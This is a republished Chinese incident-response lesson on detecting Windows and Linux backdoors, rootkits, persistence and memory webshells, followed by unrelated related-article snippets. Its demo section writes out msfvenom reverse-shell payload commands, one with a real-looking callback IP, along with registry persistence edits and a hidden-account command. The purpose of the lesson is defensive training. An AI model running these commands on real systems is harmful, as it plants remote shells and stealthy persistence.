第163天:应急响应-后门攻击检测指南Rookit内存马权限维持WINLinux

news2024/12/25 0:51:06

在这里插入图片描述

知识点

#知识点
-网页篡改与后门攻击防范应对指南
主要需了解:异常特征,处置流程,分析报告等
主要需了解:日志存储,Webshell检测,分析思路等
掌握:
中间件日志存储,日志格式内容介绍(IP,UA头,访问方法,请求文件,状态码等)
Webshell查杀(常规后门,内存马(单独还有))
分析思路:基于时间,基于漏洞,基于后门筛选(还有)

#内容点:
应急响应:
1、抗拒绝服务攻击防范应对指南
2、勒索软件防范应对指南
3、钓鱼邮件攻击防范应对指南
4、网页篡改与后门攻击防范应对指南
5、网络安全漏洞防范应对指南
6、大规模数据泄露防范应对指南
7、僵尸网络感染防范应对指南
8、APT攻击入侵防范应对指南
9、各种辅助类分析工具项目使用
朔源反制:
威胁情报,信息库追踪,设备反制,IDS&IPS等反制,工具漏洞反制,蜜罐钓鱼反制等

在这里插入图片描述

演示案例:

1、Windows-后门-常规&权限维持&内存马

2、Linux-后门-常规&权限维持&Rootkit&内存马
Windows实验
1、常规MSF后门-分析检测
2、权限维持后门-分析检测
3、Web程序内存马-分析检测
常见工具集合:
https://mp.weixin.qq.com/s/L3Lv06bFdUX_ZE4rS69aDg
常规后门:
msfvenom -p windows/meterpreter/reverse_tcp lhost=xx.xx.xx.xx lport=6666 -f exe -o shell.exe
自启动测试:
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "backdoor" /t REG_SZ /F /D "C:\shell.exe"
隐藏账户:
net user xiaodi$ xiaodi!@#X123 /add
映像劫持
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe /c calc"
屏保&登录
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "C:\shell.exe" /f
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /V "Userinit" /t REG_SZ /F /D "C:\shell.exe"

Linux实验
1、常规MSF后门-分析检测
2、Rootkit后门-分析检测
3、权限维持后门-分析检测
4、Web程序内存马-分析检测
https://mp.weixin.qq.com/s/L3Lv06bFdUX_ZE4rS69aDg
常规后门:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=47.94.236.117 LPORT=7777 -f elf >shell.elf
Rootkit后门:GScan rkhunter 
权限维持后门:GScan rkhunter
1、GScan
https://github.com/grayddq/GScan
python GScan.py
2、rkhunter
wget http://downloads.sourceforge.net/project/rkhunter/rkhunter/1.4.6/rkhunter-1.4.6.tar.gz
tar -xvf rkhunter-1.4.6.tar.gz 
cd rkhunter-1.4.6 
./installer.sh --layout default --install
rkhunter -c

Web层面:通用系统层面
1、常规后门
2、内存马(无文件马)
    PHP
    .NET
    JAVA
    Python

总结

1、对于系统层面的后门:
1.1、windows
对于常规MSF后门,其一般会有网络外连的情况,可使用火绒剑、PCHunter工具查看网络,针对网络外连的进行逐一排查
对于权限维持后门,比如自启动、映像劫持,在火绒剑、PCHunter里也有对应的栏目,也可逐一排查

1.2、linux
对于常规MSF后门,其一般会有网络外连的情况,可使用命令:netstat -anpt  针对网络外连的进行逐一排查
对于Rootkit、权限维持后门,可使用工具GScan、rkhunter进行排查

2、对于Web层面的后门:
2.1、普通Web后门
基于客户反映的情况,我们拿到的信息可能是时间、漏洞,也可能什么也没有。
如果有大概时间信息,那么可以通过时间筛选日志,看IP、请求地址、UA头、响应码等定位攻击,再锁定该IP看有无其他行为
如果只知道框架信息,那么就根据框架可能存在的漏洞,复现一遍,查看新产生的日志拿到攻击指纹信息,然后以此筛选日志,定位攻击
如果没有任何信息,那么先使用后门查杀工具锁定后门,看哪个IP在访问该后门,然后针对该IP筛选日志,定位攻击

2.2、内存马
PHP内存马其实是进程马,只要把对应进程停掉,删除后就没了;Java内存马才是真正意义上的内存马
Java内存马根据不同的Java中间件有不同的实现方式,比如Tomcat的内存马主要有Servlet、Filter、Listener、Tomacat Valve
使用工具查杀Java内存马:
河马的内存马查杀工具(优点:适用多种中间件的内存马;缺点:易出Bug,不支持直接Dump或Kill)
脚本 tomcat-memshell-scanner.jsp(优点:好用,支持直接Dump或Kill;缺点:只支持Tomcat的内存马)

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/726055.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Qt之QMainWindow 自定义标题栏

简述 Qt自带标题栏功能还是很强大的,但是确实不能百分百满足需求,除了丑以外还不能随意更改标题栏字体,也不能更改样式;所以为了满足自己的虚荣心让标题栏变得更加好用看好看,特地花时间做了以下测试; 支持…

MySQL:数据的增删改查

数据的增删改查 前言一、插入数据1、实际问题2、方式1:VALUES的方式添加3、方式2:将查询结果插入到表中 二、删除数据三、更新数据四、查询数据五、MySQL8新特性:计算列 前言 本博主将用CSDN记录软件开发求学之路上亲身所得与所学的心得与知…

Dubbo sentinel 哨兵 熔断 慢调用比例、异常比例、异常数

目录 熔断报这个错误 在调用程序中检测即可 页面配置熔断,配置在 consumer 消费端 慢调用比例规则 最大rt 比例阈值 熔断时长 最小请求数 统计时长 让流量一直降低发送 异常数量 设置30个异常数 Tps 异常数量未达到30个正常运行 设置1个效果直接连续…

git bash 命令行反应慢、卡顿

1. 在Windows11的电脑上安装了git 后,鼠标右键打开git bash here,打开窗口缓慢,输入命令也慢的要死,如果安装git的时候选择在桌面创建图标,通过桌面图标打开也是一样的 2. 最简单的ls 命令,都要停顿半秒 3.…

Spring Security OAuth2.0(4):Spring Security集成SpringBoot

文章目录 前言一、创建工程二、spring容器配置三、Servlet Context配置四、安全配置五、创建测试七、启动服务器测试 前言 \qquad Spring Boot 是一套Spring的快速开发框架,基于Spring4.0设计,使用Spring Boot开发可以避免一些繁琐的工程搭建和配置&…

d3dx9_43.dll丢失怎么解决

d3dx9_43.dll丢失的影响 当我们在运行某些需要DirectX 9支持的程序时,如果系统中缺少d3dx9_43.dll文件,就会出现错误提示,导致程序无法正常启动。这个错误提示通常会类似于“找不到d3dx9_43.dll”或“d3dx9_43.dll不存在”。 打开电脑浏览器…

剑指 Offer 37: 序列化二叉树

这道题很复杂,首先需要发现是层序遍历,因为只有层序遍历才是这个顺序,并且new就可以调用,说明这里里面就生成了一个新的String(可以new一个String),给StringBuilder初始化一个],然后…

力扣题库刷题笔记31--下一个排列

1、题目如下: 2、个人Python代码实现如下: 前几次提交错误,主要是在上面截图第19行代码,原先写的是Nums nums[:i] temp,然后本地一直能跑过,这里不做多赘述 3、个人Python代码思路: 首先来讲本…

使用springboot框架Java+vue2开发的智慧班牌系统源码,SaaS云平台前后端分离架构

智慧班牌系统可实现数字化办公,对外向学生家长提供各种服务,如:消息通知、请假管理,校园活动,学生动态,教师通讯录,学生定位等各种服务。对内向教师提供各类服务,如:班级…

SpringMVC-1

学习笔记: SpringMVC 框架 Spring Web MVC 是一种基于 Java 实现了 MVC 设计模式的请求驱动型的轻量级 Web 框架,即使用了 MVC 架构模式的思想,将 web 层进行职责解耦,基于请求驱动指的就是使用请求-响应模型,框架的…

[PG]查看数据库大小

查看库大小 select d."oid" as "对象ID", d."datname" as "实例名", d."owner" as "所属者",pg_catalog.pg_size_pretty(d."size") as "大小" from (select oid, datname, pg_catalog.pg_ge…

小程序根据登录的角色动态设置 tabBar

根据登录的状态来展示tabbar的名称 type1 》 供应商 》 合同 送货单 我的 type2 》 监理 》 合同 抽检单 我的 在登录之后就拿到type的值 以及登陆之后跳转到合同页面 在合同页面可以书写逻辑 onShow(){if (Number(uni.getStorageSync("type")) 2) {console.log(11…

mybatis表达式判断引发的问题

在做条件查询的时候, 看似好像没啥问题,但是在查询的时候,检索条件无效,只要把! 去掉就好了, 完美解决。

记录第一次组装电脑遇到的坑

京东装机大师配置清单如下: 主板cpu安装 本次安装拆了两次主板 原因1.主板侧面有个金属板需要从内部安装 2.cpu风扇有个板需要装在主板底下 显卡比较大个要最后装,要不然可能要拆好几次 装系统时候 u盘启动认不出来,他妈的是因为机箱上的usb…

【深度学习】AIGC ,ControlNet 论文,原理,训练,部署,实战,教程(三)

文章目录 源码资源下载Python环境试玩controlnet训练数据准备选一个Stable diffusion模型开始训练 第一篇:https://qq742971636.blog.csdn.net/article/details/131531168 源码资源下载 目前 ControlNet 1.1 还在建设,本文这里使用源码 https://github…

MSP432自主开发笔记2:八路寻迹模块的编程

今日得以继续我的MSP432学习之路,今日学习八路寻迹模块的编程与测试: 本章需要掌握的知识只有俩个:串口通信发送数据、GPIO基础初始化与获取电平状态 这俩个在我专栏里都可寻到,大家可以自行查找~~ 八路灰度寻迹模块的原理与应用…

【UE5 Cesium】13-Cesium for Unreal 加载本地倾斜摄影

目录 效果 步骤 一、获取倾斜摄影资源 二、使用CesiumLab转换 三、在UE中加载转换后的倾斜摄影 效果 步骤 一、获取倾斜摄影资源 首先下载免费的资源,这里是从規劃署 香港三維實景模型 规划署 香港三维实景模型下载的, 我下载了如下6个区域的资源…

突破AI大模型工业化开发,生成式AI迎来全链条服务商

LLM大模型和生成式AI在2023年上半年迅速爆发,不仅高盛集团和麦肯锡发布了生成式AI的经济前景预测,纷纷认为生成式AI将为全球生产力带来显著提升,每年将为全球带来数万亿美元的经济增长,更有UC伯克利和斯坦福等先后发布了LLM大模型…

Centos环境Access denied for user ‘root‘@‘%to database ‘xxx‘

Centos7解决数据库出现Access denied for user ‘root‘‘%to database ‘xxx‘ 问题 原因: root%表示 root用户 通过任意其他端访问操作 被拒绝! 授权即可: 1:进入数据库 mysql -u root -p 2.输入 mysql>grant all privileges on *.* to root% with grant o…

CCF-CSP真题《202303-5 施肥》思路+python,c++满分题解

想查看其他题的真题及题解的同学可以前往查看:CCF-CSP真题附题解大全 试题编号:202303-5试题名称:施肥时间限制:2.0s内存限制:1.0GB问题描述: 问题描述 春天到了,西西艾弗岛上的 n 块田地需要施…